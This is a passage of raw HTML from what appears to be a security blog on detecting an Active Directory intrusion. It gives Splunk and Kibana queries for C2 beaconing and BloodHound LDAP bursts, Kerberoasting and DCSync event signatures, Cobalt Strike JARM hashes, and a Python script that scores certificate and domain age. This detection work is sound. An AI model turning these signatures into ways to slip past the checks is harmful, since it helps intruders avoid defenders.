a <code>$</code> computer account) requesting replication permissions is an unconditional true positive; it has no legitimate explanation in a normal environment.</p>\n<p><strong>Low-and-slow Kerberoasting - no volume anomaly to detect:</strong></p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">Event ID: 4769 (Kerberos Service Ticket Operation)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Account Name:  jsmith@CORP.LOCAL</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Service Name:  svcbackup</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  Ticket Encryption Type: 0x17   &lt;-- RC4-HMAC: this is the tell</span><br></span></code></pre></div></div>\n<p>Encryption type <code>0x17</code> (RC4-HMAC) for a TGS request, when AES is available and expected, is anomalous. 
If your service accounts are configured to support only AES, any RC4 TGS request is impossible under normal operation, making it a zero-false-positive detection.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"section-4--the-three-detection-checkpoints-you-must-win\">Section 4: The Three Detection Checkpoints You Must Win<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#section-4--the-three-detection-checkpoints-you-must-win\" class=\"hash-link\" aria-label=\"Direct link to Section 4  The Three Detection Checkpoints You Must Win\" title=\"Direct link to Section 4  The Three Detection Checkpoints You Must Win\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"checkpoint-1-c2-beaconing-detection\">Checkpoint 1: C2 Beaconing Detection<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#checkpoint-1-c2-beaconing-detection\" class=\"hash-link\" aria-label=\"Direct link to Checkpoint 1: C2 Beaconing Detection\" title=\"Direct link to Checkpoint 1: C2 Beaconing Detection\" translate=\"no\">​</a></h3>\n<p><strong>Connection interval jitter analysis (Splunk)</strong></p>\n<p>Normal browsing generates variable connection intervals. 
A beacon sleeping 45s ±25% generates intervals clustering in a 33–56 second band, low variance over many observations.</p>\n<div class=\"language-spl codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-spl codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">index=proxy dest_category=external action=allowed</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort 0 src_ip dest_ip _time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| streamstats current=f window=1 last(_time) as prev_time by src_ip dest_ip</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| eval gap = _time - prev_time</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where gap &gt; 0</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| stats</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    count          as req_count,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    avg(gap)       as avg_interval,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    stdev(gap)     as jitter,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    min(gap)       as min_gap,</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    max(gap)       as max_gap</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by src_ip, dest_ip</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where req_count &gt; 20</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND avg_interval &gt; 20</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND avg_interval &lt; 300</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND jitter &lt; 15</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    AND (max_gap - min_gap) &lt; 60</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| table src_ip, dest_ip, req_count, avg_interval, jitter</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort jitter</span><br></span></code></pre></div></div>\n<p><strong>JARM fingerprint matching</strong></p>\n<p>JARM fingerprints TLS servers. 
Default Cobalt Strike team servers have known JARM hashes regardless of the domain or certificate used.</p>\n<div class=\"language-bash codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-bash codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Fingerprint a suspicious C2 candidate</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">python3 jarm.py suspicious-domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">.</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\">com </span><span class=\"token parameter variable\" style=\"color:hsl(26, 100%, 29%)\">-p</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">443</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Known malicious JARM hashes (Cobalt Strike defaults as of 2023):</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 
07d14d16d21d21d07c42d41d00041d24a458a375eef0c576d23a7bab9a9fb1</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># 2ad2ad0002ad2ad22c42d42d000000032d2ad2ad2ad2ad2ad0ad23abf4b834</span><br></span></code></pre></div></div>\n<p><strong>Certificate age + infrastructure freshness (Python)</strong></p>\n<div class=\"language-python codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-python codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">import</span><span class=\"token plain\"> ssl</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> datetime</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">def</span><span class=\"token plain\"> </span><span class=\"token function\" style=\"color:hsl(256, 54%, 50%)\">check_c2_indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 
16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    indicators </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Check certificate issuance date</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    ctx </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> ssl</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">create_default_context</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">with</span><span class=\"token plain\"> ctx</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">wrap_socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token 
plain\">socket</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> server_hostname</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">as</span><span class=\"token plain\"> s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">connect</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">443</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        cert </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> s</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">getpeercert</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        not_before </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">strptime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">            cert</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'notBefore'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"%b %d %H:%M:%S %Y %Z\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        cert_age_days </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">utcnow</span><span 
class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> not_before</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">days</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'cert_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> cert_age_days </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">30</span><span class=\"token plain\">  </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Fresh cert: suspicious</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Check domain registration age via WHOIS</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 
47%)\">import</span><span class=\"token plain\"> whois</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    w </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> whois</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">whois</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">domain</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">:</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        reg_date </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">if</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">isinstance</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span 
class=\"token plain\">w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">list</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">else</span><span class=\"token plain\"> w</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">creation_date</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        domain_age </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">datetime</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">utcnow</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">-</span><span class=\"token plain\"> reg_date</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">days</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span 
class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'domain_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> domain_age </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">&lt;</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">90</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token comment\" style=\"color:hsl(212, 9%, 47%);font-style:italic\"># Score: cert_young + domain_young + suspicious_asn = high confidence C2</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    score </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> </span><span class=\"token builtin\" style=\"color:hsl(212, 92%, 35%)\">sum</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\">indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'cert_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 
13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">                 indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">.</span><span class=\"token plain\">get</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">(</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'domain_young'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"> </span><span class=\"token number\" style=\"color:hsl(212, 92%, 35%)\">0</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">)</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    indicators</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">'suspicion_score'</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">]</span><span class=\"token plain\"> </span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">=</span><span class=\"token plain\"> score</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token keyword\" style=\"color:hsl(356, 75%, 47%)\">return</span><span class=\"token plain\"> indicators</span><br></span></code></pre></div></div>\n<p>Domains scoring 2/2 on this check warrant immediate investigation.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"checkpoint-2-bloodhound-collection-detection\">Checkpoint 2: BloodHound Collection 
Detection<a href=\"https://inferencedefense.com/academy/blog-internal/apt-initial-access-to-domain-dominance-4-hours#checkpoint-2-bloodhound-collection-detection\" class=\"hash-link\" aria-label=\"Direct link to Checkpoint 2: BloodHound Collection Detection\" title=\"Direct link to Checkpoint 2: BloodHound Collection Detection\" translate=\"no\">​</a></h3>\n<p>The LDAP burst signature is distinctive. Alert condition: <strong>more than 150 Event ID 1644 entries from a single non-DC source within 5 minutes.</strong></p>\n<p>Event ID 1644 must be enabled explicitly:</p>\n<div class=\"language-text codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-text codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"># Enable on all DCs via GPO or registry:</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Diagnostics\" /v \"15 Field Engineering\" /t REG_DWORD /d 5 /f</span><br></span></code></pre></div></div>\n<p>Kibana query:</p>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"query\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"bool\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">      </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"must\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">[</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"term\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"event.code\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 
32%)\">\"1644\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"term\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"winlog.channel\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Directory Service\"</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">        </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"range\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"> </span><span 
